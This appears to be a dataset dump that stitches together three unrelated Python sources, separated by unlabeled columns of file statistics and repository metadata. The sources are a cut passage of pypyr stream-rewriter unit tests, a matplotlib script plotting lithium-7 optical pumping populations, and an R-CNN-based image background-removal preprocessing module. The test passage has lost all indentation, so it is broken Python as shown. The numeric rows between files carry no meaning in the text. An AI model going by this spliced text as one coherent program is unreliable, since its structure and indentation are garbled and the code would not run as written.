@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=FileRewriter)
def test_streamrewriterstep_run_step(mock_rewriter):
"""Stream rewriter runs files_in_to_out on stream rewriter."""
context = Context({'root': {'in': 'inpathhere',
'out': 'outpathhere',
'encodingIn': 'encIn',
'encodingOut': 'encOut'}})
obj = StreamRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'encIn'
assert obj.encoding_out == 'encOut'
obj.run_step()
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.iter_formatted_strings,
encoding_in='encIn',
encoding_out='encOut')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=StreamRewriter)
def test_streamrewriterstep_run_step_no_out(mock_rewriter):
"""Stream rewriter runs files_in_to_out on stream rewriter."""
context = Context({'root': {'in': 'inpathhere', 'out': None}})
obj = StreamRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
obj.run_step()
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.iter_formatted_strings,
encoding_in=None,
encoding_out=None)
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
# endregion StreamRewriterStep
# region StreamReplacePairsRewriterStep
@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=StreamRewriter)
def test_streamreplacepairsrewriterstep_run_step(mock_rewriter):
"""Stream replace pairs rewriter runs files_in_to_out."""
context = Context({'root': {'in': 'inpathhere',
'out': 'outpathhere',
'replacePairs': {
'a': 'b',
'c': 'd'
},
'encodingIn': 'encIn',
'encodingOut': 'encOut'}})
obj = StreamReplacePairsRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.replace_pairs == {'a': 'b', 'c': 'd'}
assert obj.encoding_in == 'encIn'
assert obj.encoding_out == 'encOut'
iter_replace_strings_target = ('pypyr.steps.dsl.fileinoutrewriter.'
'StreamReplacePairsRewriterStep.'
'iter_replace_strings')
with patch(iter_replace_strings_target) as mock_iter:
obj.run_step()
# the rewriter should've been instantiated with the iter_replace_strings
# function.
mock_iter.assert_called_once_with({'a': 'b', 'c': 'd'})
assert mock_rewriter.mock_calls[0] == call(mock_iter.return_value,
encoding_in='encIn',
encoding_out='encOut')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=StreamRewriter)
def test_streamreplacepairsrewriterstep_run_step_no_out(mock_rewriter):
"""Stream replace pairs rewriter runs files_in_to_out with no out."""
context = Context({'root': {'in': 'inpathhere',
'replacePairs': {
'a': 'b',
'c': 'd'
},
'encoding': 'arb'}})
obj = StreamReplacePairsRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.replace_pairs == {'a': 'b', 'c': 'd'}
assert obj.encoding_in == 'arb'
assert obj.encoding_out == 'arb'
iter_replace_strings_target = ('pypyr.steps.dsl.fileinoutrewriter.'
'StreamReplacePairsRewriterStep.'
'iter_replace_strings')
with patch(iter_replace_strings_target) as mock_iter:
obj.run_step()
# the rewriter should've been instantiated with the iter_replace_strings
# function.
mock_iter.assert_called_once_with({'a': 'b', 'c': 'd'})
assert mock_rewriter.mock_calls[0] == call(mock_iter.return_value,
encoding_in='arb',
encoding_out='arb')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
# region iter_replace_strings
def test_iter_replace_string_empties():
"""Nothing in, nothing out."""
in_string = ''
replace_pairs = {}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert not list(result(in_string))
def test_iter_replace_string_one_none():
"""One in, none out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'ten': '10'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string)) == in_string
def test_iter_replace_string_one_one():
"""One in, one out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'six': '6'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string))[
0] == 'one two three four five 6 seven eight'
def test_iter_replace_string_two_one():
"""Two in, one out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'six': '6', 'XXX': '3'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string))[
0] == 'one two three four five 6 seven eight'
def test_iter_replace_string_two_two():
"""Two in, two out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'six': '6', 'three': '3'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string))[0] == 'one two 3 four five 6 seven eight'
def test_iter_replace_string_instring_actually_iterates():
"""Iterates over an in iterable."""
in_string = ['one two three', 'four five six', 'seven eight nine']
replace_pairs = {'six': '6', 'three': '3'}
func = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
result = list(func(in_string))
assert result[0] == 'one two 3'
assert result[1] == 'four five 6'
assert result[2] == 'seven eight nine'
def test_iter_replace_string_later_replace_earlier():
"""A later replacement replaces one from earlier."""
in_string = ['one two three', 'four five six', 'seven eight nine']
replace_pairs = {'six': '6', 'three': '3', '6': 'XXX'}
func = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
result = list(func(in_string))
assert result[0] == 'one two 3'
assert result[1] == 'four five XXX'
assert result[2] == 'seven eight nine'
# endregion iter_replace_strings
# endregion StreamReplacePairsRewriterStep
| 37.45122
| 79
| 0.62732
| 2,047
| 18,426
| 5.439668
| 0.080606
| 0.067086
| 0.051729
| 0.03242
| 0.878761
| 0.844634
| 0.829097
| 0.805029
| 0.772339
| 0.755815
| 0
| 0.003632
| 0.252795
| 18,426
| 491
| 80
| 37.527495
| 0.805128
| 0.108759
| 0
| 0.748466
| 0
| 0
| 0.18278
| 0.040283
| 0
| 0
| 0
| 0
| 0.377301
| 1
| 0.082822
| false
| 0
| 0.018405
| 0
| 0.101227
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73b4b97cfbd2b37253232ead5c0168f5b6331099
| 8,844
|
py
|
Python
|
opli7/plot.py
|
SuperYuLu/OpticalPumpingLithium7Dline
|
0b38c8ea755b922864f06e66151c43383ab24abb
|
[
"MIT"
] | 4
|
2019-12-12T00:10:33.000Z
|
2021-04-22T21:58:30.000Z
|
opli7/plot.py
|
SuperYuLu/OPLi7
|
0b38c8ea755b922864f06e66151c43383ab24abb
|
[
"MIT"
] | 8
|
2017-09-19T05:01:20.000Z
|
2017-10-16T03:24:52.000Z
|
opli7/plot.py
|
SuperYuLu/OpticalPumpingLithium7Dline
|
0b38c8ea755b922864f06e66151c43383ab24abb
|
[
"MIT"
] | 2
|
2020-02-07T22:56:46.000Z
|
2021-04-22T21:58:37.000Z
|
# plot.py ---
#
# Filename: plot.py
# Description:
# plot the population vs time for
# ground and excited states sublevels
# Author: Yu Lu
# Email: yulu@utexas.edu
# Github: https://github.com/SuperYuLu
#
# Created: Thu Oct 5 17:52:51 2017 (-0500)
# Version: V1.0
# Last-Updated: Fri Nov 16 00:51:57 2018 (-0600)
# By: yulu
# Update #: 109
#
import matplotlib.pyplot as plt
import os
def plotPopulation( clock, Dline, eStates, polarization1, polarization2, I1, I2, popG, popE, saveFig = True):
"""
plot population distrubution for ground and excited states
and specify condition in the title
optionally save the figure to ./img/ folder
"""
excitedState = '2P3halves(unresolved)' if Dline == 'D2' else eStates[0]
lw = 2
fig = plt.figure(figsize = (15, 15), dpi = 150)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
for f, fmt in zip(['F1', 'F2'], ['-', '--']):# Ground states
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(clock * 1e6, [x[0][i] for x in popG[f]], fmt, \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.set_title('Li7 ' + Dline + ' transition ground(top) and excited(bottom) hpf states population\n' \
+ 'F1 -> ' + excitedState + ': ' + polarization1 + ' pol. ' + str(I1) + ' mW/cm2 || ' \
+ 'F2 -> ' + excitedState + ': ' + polarization2 + ' pol. ' + str(I2) + ' mW/cm2', fontsize = 15)
ax1.set_xlabel('Time [us]')
ax1.legend(fontsize = 10)
for f in list(popE.keys()):#p.eStates:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax2.plot(clock * 1e6, [x[0][i] for x in popE[f]], "-",\
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax2.set_xlabel('Time [us]')
ax2.legend(fontsize = 10)
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/Dline" + "_to" + excitedState + "_" + polarization1 + "_" + polarization2 + ".png"
fig.savefig(fileName)
print("[*]plots saved in " + fileName)
plt.show()
def plotParameterScan(scanPara, scanValues, steadyPopG, steadyPopE, steadyTime, saveFig = True):
lw = 2 # plot linewidth
fig = plt.figure(figsize = (15, 10), dpi=150)
# Ground states
ax1 = fig.add_subplot(211)
for f in ['F1', 'F2']:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(scanValues, [x[0][i] for x in steadyPopG[f]], "*--", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.legend(fontsize = 12)
ax1.set_ylabel('Steady State Population')
ax1.set_xlabel('%s[default unit]' %scanPara)
ax1.set_title('Optical pumping parameter scan: %s' %scanPara)
# # Excited states
# print(steadyPopG)
# ax2 = fig.add_subplot(312)
# for f in list(steadyPopE.keys()):#p.eStates:
# fNum = int(f[-1])
# for i in range(2 * fNum + 1):
# ax2.plot(scanValues, [x[0][i] for x in steadyPopE[f]], "-",\
# label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
# ax2.set_xlabel('laser intensity [mw/cm^2]')
# ax2.legend(fontsize = 12)
# Steady states time
ax3 = fig.add_subplot(212)
ax3.plot(scanValues, steadyTime * 1e6, '^--')
ax1.set_xlabel('%s[default unit]' %scanPara)
ax3.set_ylabel('Time to reach steady state [us]')
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/laser_intensity_scan.png"
fig.savefig(fileName)
print("[*]plots saved in ", fileName)
plt.show()
def plotIntensityScan(laserInten, steadyPopG, steadyPopE, steadyTime, saveFig = True):
import matplotlib.pyplot as plt
import os
lw = 2 # plot linewidth
fig = plt.figure(figsize = (15, 10), dpi=150)
# Ground states
ax1 = fig.add_subplot(211)
for f in ['F1', 'F2']:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(laserInten, [x[0][i] for x in steadyPopG[f]], "*--", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.legend(fontsize = 12)
ax1.set_ylabel('Steady State Population')
ax1.set_title('Optical pumping under different laser intensities')
# # Excited states
# print(steadyPopG)
# ax2 = fig.add_subplot(312)
# for f in list(steadyPopE.keys()):#p.eStates:
# fNum = int(f[-1])
# for i in range(2 * fNum + 1):
# ax2.plot(laserInten, [x[0][i] for x in steadyPopE[f]], "-",\
# label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
# ax2.set_xlabel('laser intensity [mw/cm^2]')
# ax2.legend(fontsize = 12)
# Steady states time
ax3 = fig.add_subplot(212)
ax3.plot(laserInten, steadyTime * 1e6, '^--')
ax3.set_xlabel('laser intensity [mw/cm^2]')
ax3.set_ylabel('Time to reach steady state [us]')
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/laser_intensity_scan.png"
fig.savefig(fileName)
print("[*]plots saved in ./img/" + fileName)
plt.show()
def plotDetuneScan(laserDetune, steadyPopG, steadyPopE, steadyTime, saveFig = True):
import matplotlib.pyplot as plt
import os
lw = 2 # plot linewidth
fig = plt.figure(figsize = (15, 10), dpi=150)
# Ground states
ax1 = fig.add_subplot(211)
for f in ['F1', 'F2']:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(laserDetune*1e-6, [x[0][i] for x in steadyPopG[f]], "*--", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.legend(fontsize = 12)
ax1.set_ylabel('Steady State Population')
ax1.set_title('Optical pumping under different laser detune')
# # Excited states
# print(steadyPopG)
# ax2 = fig.add_subplot(312)
# for f in list(steadyPopE.keys()):#p.eStates:
# fNum = int(f[-1])
# for i in range(2 * fNum + 1):
# ax2.plot(laserInten, [x[0][i] for x in steadyPopE[f]], "-",\
# label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
# ax2.set_xlabel('laser intensity [mw/cm^2]')
# ax2.legend(fontsize = 12)
# Steady states time
ax3 = fig.add_subplot(212)
ax3.plot(laserDetune * 1e-6, steadyTime * 1e6, '^--')
ax3.set_xlabel('laser Detune [MHz]')
ax3.set_ylabel('Time to reach steady state [us]')
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/laser_detune_scan.png"
fig.savefig(fileName)
print("[*]plots saved in ./img/" + fileName)
plt.show()
def plotPop_special( clock, Dline, eStates, polarization1, polarization2, I1, I2, popG, popE, saveFig = True):
"""
plot population distrubution for ground and excited states
and specify condition in the title
optionally save the figure to ./img/ folder
"""
import matplotlib.pyplot as plt
import os
excitedState = '2P3halves(unresolved)' if Dline == 'D2' else eStates[0]
lw = 3
fig = plt.figure(figsize = (15, 15), dpi = 150)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
for f in ['F1', 'F2']:# Ground states
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(clock * 1e6, [x[0][i] for x in popG[f]], "-", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.set_title('Li7 ' + Dline + ' transition ground(top) and excited(bottom) hpf states population\n' \
+ 'F1 -> ' + excitedState + ': ' + polarization1 + ' pol. ' + str(I1) + ' mW/cm2 || ' \
+ 'F2 -> ' + excitedState + ': ' + polarization2 + ' pol. ' + str(I2) + ' mW/cm2', fontsize = 15)
ax1.set_xlabel('Time [us]')
ax1.set_ylim([0, 0.2])
ax1.set_xlim([0, 20])
ax1.legend(fontsize = 12)
for f in list(popE.keys()):#p.eStates:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax2.plot(clock * 1e6, [x[0][i] for x in popE[f]], "-",\
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax2.set_xlabel('Time [us]')
ax2.legend(fontsize = 12)
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/Dline" + "_to" + excitedState + "_" + polarization1 + "_" + polarization2 + ".png"
fig.savefig(fileName)
print("[*]plots saved in " + fileName)
plt.show()
| 37.159664
| 116
| 0.54896
| 1,160
| 8,844
| 4.142241
| 0.156034
| 0.029136
| 0.035172
| 0.01873
| 0.893028
| 0.873673
| 0.8641
| 0.831634
| 0.82539
| 0.82539
| 0
| 0.049795
| 0.284713
| 8,844
| 237
| 117
| 37.316456
| 0.709769
| 0.224672
| 0
| 0.807143
| 0
| 0
| 0.155078
| 0.019125
| 0.014286
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.057143
| 0
| 0.092857
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73d9a4d147db37b03ec917ed6138217372500124
| 19,123
|
py
|
Python
|
libs/preprocessing.py
|
jinwyp/image-background-remove-tool
|
da156bab294df284d4daee69216288af87f24bc3
|
[
"Apache-2.0"
] | 585
|
2019-07-19T14:59:00.000Z
|
2022-03-31T05:39:30.000Z
|
libs/preprocessing.py
|
jinwyp/image-background-remove-tool
|
da156bab294df284d4daee69216288af87f24bc3
|
[
"Apache-2.0"
] | 54
|
2020-03-19T18:55:38.000Z
|
2022-03-12T00:34:57.000Z
|
libs/preprocessing.py
|
jinwyp/image-background-remove-tool
|
da156bab294df284d4daee69216288af87f24bc3
|
[
"Apache-2.0"
] | 164
|
2019-10-22T23:32:44.000Z
|
2022-03-31T05:39:29.000Z
|
"""
Name: Pre-processing class file
Description: This file contains pre-processing classes.
Version: [release][3.2]
Source url: https://github.com/OPHoperHPO/image-background-remove-tool
Author: Anodev (OPHoperHPO)[https://github.com/OPHoperHPO] .
License: Apache License 2.0
License:
Copyright 2020 OPHoperHPO
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import time
import numpy as np
from PIL import Image
from libs.strings import PREPROCESS_METHODS
logger = logging.getLogger(__name__)
def method_detect(method: str):
"""Detects which method to use and returns its object"""
if method in PREPROCESS_METHODS:
if method == "bbmd-maskrcnn":
return BoundingBoxDetectionWithMaskMaskRcnn()
elif method == "bbd-fastrcnn":
return BoundingBoxDetectionFastRcnn()
else:
return None
else:
return False
class BoundingBoxDetectionFastRcnn:
"""
Class for the image preprocessing method.
This image pre-processing technique uses two neural networks ($used_model and Fast RCNN)
to first detect the boundaries of objects in a photograph,
cut them out, sequentially remove the background from each object in turn
and subsequently collect the entire image from separate parts
"""
def __init__(self):
self.__fast_rcnn__ = FastRcnn()
self.model = None
self.prep_image = None
self.orig_image = None
@staticmethod
def trans_paste(bg_img, fg_img, box=(0, 0)):
"""
Inserts an image into another image while maintaining transparency.
:param bg_img: Background pil image
:param fg_img: Foreground pil image
:param box: Bounding box
:return: Pil Image
"""
fg_img_trans = Image.new("RGBA", bg_img.size)
fg_img_trans.paste(fg_img, box, mask=fg_img)
new_img = Image.alpha_composite(bg_img, fg_img_trans)
return new_img
@staticmethod
def __orig_object_border__(border, orig_image, resized_image, indent=16):
"""
Rescales the bounding box of an object
:param indent: The boundary of the object will expand by this value.
:param border: array consisting of the coordinates of the boundaries of the object
:param orig_image: original pil image
:param resized_image: resized image ndarray
:return: tuple consisting of the coordinates of the boundaries of the object
"""
x_factor = resized_image.shape[1] / orig_image.size[0]
y_factor = resized_image.shape[0] / orig_image.size[1]
xmin, ymin, xmax, ymax = [int(x) for x in border]
if ymin < 0:
ymin = 0
if ymax > resized_image.shape[0]:
ymax = resized_image.shape[0]
if xmax > resized_image.shape[1]:
xmax = resized_image.shape[1]
if xmin < 0:
xmin = 0
if x_factor == 0:
x_factor = 1
if y_factor == 0:
y_factor = 1
border = (int(xmin / x_factor) - indent,
int(ymin / y_factor) - indent, int(xmax / x_factor) + indent, int(ymax / y_factor) + indent)
return border
def run(self, model, prep_image, orig_image):
"""
Runs an image preprocessing algorithm to improve background removal quality.
:param model: The class of the neural network used to remove the background.
:param prep_image: Prepared for the neural network image
:param orig_image: Source image
:returns: Image without background
"""
_, resized_image, results = self.__fast_rcnn__.process_image(orig_image)
classes = self.__fast_rcnn__.class_names
bboxes = results['bboxes']
ids = results['ids']
scores = results['scores']
object_num = len(bboxes) # We get the number of all objects in the photo
if object_num < 1: # If there are no objects, or they are not found,
# we try to remove the background using standard tools
return model.__get_output__(prep_image, orig_image)
else:
# Check that all arrays match each other in size
if ids is not None and not len(bboxes) == len(ids):
return model.__get_output__(prep_image,
orig_image) # we try to remove the background using standard tools
if scores is not None and not len(bboxes) == len(scores):
return model.__get_output__(prep_image, orig_image)
# we try to remove the background using standard tools
objects = []
for i, bbox in enumerate(bboxes):
if scores is not None and scores.flat[i] < 0.5:
continue
if ids is not None and ids.flat[i] < 0:
continue
object_cls_id = int(ids.flat[i]) if ids is not None else -1
if classes is not None and object_cls_id < len(classes):
object_label = classes[object_cls_id]
else:
object_label = str(object_cls_id) if object_cls_id >= 0 else ''
object_border = self.__orig_object_border__(bbox, orig_image, resized_image)
objects.append([object_label, object_border])
if objects:
if len(objects) == 1:
return model.__get_output__(prep_image, orig_image)
# we try to remove the background using standard tools
else:
obj_images = []
for obj in objects:
border = obj[1]
obj_crop = orig_image.crop(border)
# TODO: make a special algorithm to improve the removal of background from images with people.
if obj[0] == "person":
obj_img = model.process_image(obj_crop)
else:
obj_img = model.process_image(obj_crop)
obj_images.append([obj_img, obj])
image = Image.new("RGBA", orig_image.size)
for obj in obj_images:
image = self.trans_paste(image, obj[0], obj[1][1])
return image
else:
return model.__get_output__(prep_image, orig_image)
class BoundingBoxDetectionWithMaskMaskRcnn:
"""
Class for the image preprocessing method.
This image pre-processing technique uses two neural networks
to first detect the boundaries and masks of objects in a photograph,
cut them out, expand the masks by a certain number of pixels,
apply them and remove the background from each object in turn
and subsequently collect the entire image from separate parts
"""
def __init__(self):
self.__mask_rcnn__ = MaskRcnn()
self.model = None
self.prep_image = None
self.orig_image = None
@staticmethod
def __mask_extend__(mask, indent=10):
"""
Extends the mask of an object.
:param mask: 8-bit ndarray mask
:param indent: Indent on which to expand the mask
:return: extended 8-bit mask ndarray
"""
# TODO: Rewrite this function.
height, weight = mask.shape
old_val = 0
for h in range(height):
for w in range(weight):
val = mask[h, w]
if val == 1 and old_val == 0:
for i in range(1, indent + 1):
if w - i > 0:
mask[h, w - i] = 1
old_val = val
elif val == 0 and old_val == 1:
if weight - w >= indent:
for i in range(0, indent):
mask[h, w + i] = 1
else:
for i in range(0, weight - w):
mask[h, w + i] = 1
old_val = val
break
return mask
@staticmethod
def trans_paste(bg_img, fg_img, box=(0, 0)):
"""
Inserts an image into another image while maintaining transparency.
:param bg_img: Background pil image
:param fg_img: Foreground pil image
:param box: Bounding box
:return: Pil Image
"""
fg_img_trans = Image.new("RGBA", bg_img.size)
fg_img_trans.paste(fg_img, box, mask=fg_img)
new_img = Image.alpha_composite(bg_img, fg_img_trans)
return new_img
@staticmethod
def __orig_object_border__(border, orig_image, resized_image, indent=16):
"""
Rescales the bounding box of an object
:param indent: The boundary of the object will expand by this value.
:param border: array consisting of the coordinates of the boundaries of the object
:param orig_image: original pil image
:param resized_image: resized image ndarray
:return: tuple consisting of the coordinates of the boundaries of the object
"""
x_factor = resized_image.shape[1] / orig_image.size[0]
y_factor = resized_image.shape[0] / orig_image.size[1]
xmin, ymin, xmax, ymax = [int(x) for x in border]
if ymin < 0:
ymin = 0
if ymax > resized_image.shape[0]:
ymax = resized_image.shape[0]
if xmax > resized_image.shape[1]:
xmax = resized_image.shape[1]
if xmin < 0:
xmin = 0
if x_factor == 0:
x_factor = 1
if y_factor == 0:
y_factor = 1
border = (int(xmin / x_factor) - indent,
int(ymin / y_factor) - indent,
int(xmax / x_factor) + indent,
int(ymax / y_factor) + indent)
return border
@staticmethod
def __apply_mask__(image, mask):
"""
Applies a mask to an image.
:param image: Pil image
:param mask: 8 bit Mask ndarray
:return: Pil Image
"""
image = np.array(image)
image[:, :, 0] = np.where(
mask == 0,
255,
image[:, :, 0]
)
image[:, :, 1] = np.where(
mask == 0,
255,
image[:, :, 1]
)
image[:, :, 2] = np.where(
mask == 0,
255,
image[:, :, 2]
)
return Image.fromarray(image)
def run(self, model, prep_image, orig_image):
"""
Runs an image preprocessing algorithm to improve background removal quality.
:param model: The class of the neural network used to remove the background.
:param prep_image: Prepared for the neural network image
:param orig_image: Source image
:return: Image without background
"""
_, resized_image, results = self.__mask_rcnn__.process_image(orig_image)
classes = self.__mask_rcnn__.class_names
bboxes = results['bboxes']
masks = results['masks']
ids = results['ids']
scores = results['scores']
object_num = len(bboxes) # We get the number of all objects in the photo
if object_num < 1: # If there are no objects, or they are not found,
# we try to remove the background using standard tools
return model.__get_output__(prep_image, orig_image)
else:
# Check that all arrays match each other in size
if ids is not None and not len(bboxes) == len(ids):
return model.__get_output__(prep_image,
orig_image) # we try to remove the background using standard tools
if scores is not None and not len(bboxes) == len(scores):
return model.__get_output__(prep_image, orig_image)
# we try to remove the background using standard tools
objects = []
for i, bbox in enumerate(bboxes):
if scores is not None and scores.flat[i] < 0.5:
continue
if ids is not None and ids.flat[i] < 0:
continue
object_cls_id = int(ids.flat[i]) if ids is not None else -1
if classes is not None and object_cls_id < len(classes):
object_label = classes[object_cls_id]
else:
object_label = str(object_cls_id) if object_cls_id >= 0 else ''
object_border = self.__orig_object_border__(bbox, orig_image, resized_image)
object_mask = masks[i, :, :]
objects.append([object_label, object_border, object_mask])
if objects:
if len(objects) == 1:
return model.__get_output__(prep_image, orig_image)
# we try to remove the background using standard tools
else:
obj_images = []
for obj in objects:
extended_mask = self.__mask_extend__(obj[2])
obj_masked = self.__apply_mask__(orig_image, extended_mask)
border = obj[1]
obj_crop_masked = obj_masked.crop(border)
# TODO: make a special algorithm to improve the removal of background from images with people.
if obj[0] == "person":
obj_img = model.process_image(obj_crop_masked)
else:
obj_img = model.process_image(obj_crop_masked)
obj_images.append([obj_img, obj])
image = Image.new("RGBA", orig_image.size)
for obj in obj_images:
image = self.trans_paste(image, obj[0], obj[1][1])
return image
else:
return model.__get_output__(prep_image, orig_image)
class FastRcnn:
"""
Fast Rcnn Neural Network to detect objects in the photo.
"""
def __init__(self):
from gluoncv import model_zoo, data
from mxnet import nd
self.model_zoo = model_zoo
self.data = data
self.nd = nd
logger.debug("Loading Fast RCNN neural network")
self.__net__ = self.model_zoo.get_model('faster_rcnn_resnet50_v1b_voc',
pretrained=True) # Download the pre-trained model, if one is missing.
# noinspection PyUnresolvedReferences
self.class_names = self.__net__.classes
def __load_image__(self, data_input):
"""
Loads an image file for other processing
:param data_input: Path to image file or PIL image
:return: image
"""
if isinstance(data_input, str):
try:
data_input = Image.open(data_input)
# Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
data_input = data_input.convert("RGB")
image = np.array(data_input) # Convert PIL image to numpy arr
except IOError:
logger.error('Cannot retrieve image. Please check file: ' + data_input)
return False, False
else:
# Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
data_input = data_input.convert("RGB")
image = np.array(data_input) # Convert PIL image to numpy arr
x, resized_image = self.data.transforms.presets.rcnn.transform_test(self.nd.array(image))
return x, image, resized_image
def process_image(self, image):
"""
Detects objects in the photo and returns their names, borders.
:param image: Path to image or PIL image.
:return: original pil image, resized pil image, dict(ids, scores, bboxes)
"""
start_time = time.time() # Time counter
x, image, resized_image = self.__load_image__(image)
ids, scores, bboxes = [xx[0].asnumpy() for xx in self.__net__(x)]
logger.debug("Finished! Time spent: {}".format(time.time() - start_time))
return image, resized_image, {"ids": ids, "scores": scores, "bboxes": bboxes}
class MaskRcnn:
"""
Mask Rcnn Neural Network to detect objects in the photo.
"""
def __init__(self):
from gluoncv import model_zoo, utils, data
from mxnet import nd
self.model_zoo = model_zoo
self.utils = utils
self.data = data
self.nd = nd
logger.debug("Loading Mask RCNN neural network")
self.__net__ = self.model_zoo.get_model('mask_rcnn_resnet50_v1b_coco',
pretrained=True) # Download the pre-trained model, if one is missing.
# noinspection PyUnresolvedReferences
self.class_names = self.__net__.classes
def __load_image__(self, data_input):
"""
Loads an image file for other processing
:param data_input: Path to image file or PIL image
:return: neural network input, original pil image, resized image ndarray
"""
if isinstance(data_input, str):
try:
data_input = Image.open(data_input)
# Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
data_input = data_input.convert("RGB")
image = np.array(data_input) # Convert PIL image to numpy arr
except IOError:
logger.error('Cannot retrieve image. Please check file: ' + data_input)
return False, False
else:
# Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
data_input = data_input.convert("RGB")
image = np.array(data_input) # Convert PIL image to numpy arr
x, resized_image = self.data.transforms.presets.rcnn.transform_test(self.nd.array(image))
return x, image, resized_image
def process_image(self, image):
"""
Detects objects in the photo and returns their names, borders and a mask of poor quality.
:param image: Path to image or PIL image.
:return: original pil image, resized pil image, dict(ids, scores, bboxes, masks)
"""
start_time = time.time() # Time counter
x, image, resized_image = self.__load_image__(image)
ids, scores, bboxes, masks = [xx[0].asnumpy() for xx in self.__net__(x)]
masks, _ = self.utils.viz.expand_mask(masks, bboxes, (image.shape[1], image.shape[0]), scores)
logger.debug("Finished! Time spent: {}".format(time.time() - start_time))
return image, resized_image, {"ids": ids, "scores": scores, "bboxes": bboxes,
"masks": masks}
| 41.571739
| 118
| 0.592323
| 2,404
| 19,123
| 4.522047
| 0.135607
| 0.026493
| 0.01803
| 0.019869
| 0.806366
| 0.795511
| 0.777297
| 0.762395
| 0.741514
| 0.730292
| 0
| 0.010191
| 0.327825
| 19,123
| 459
| 119
| 41.662309
| 0.835538
| 0.302672
| 0
| 0.730769
| 0
| 0
| 0.030635
| 0.004365
| 0
| 0
| 0
| 0.006536
| 0
| 1
| 0.059441
| false
| 0
| 0.031469
| 0
| 0.202797
| 0
| 0
| 0
| 0
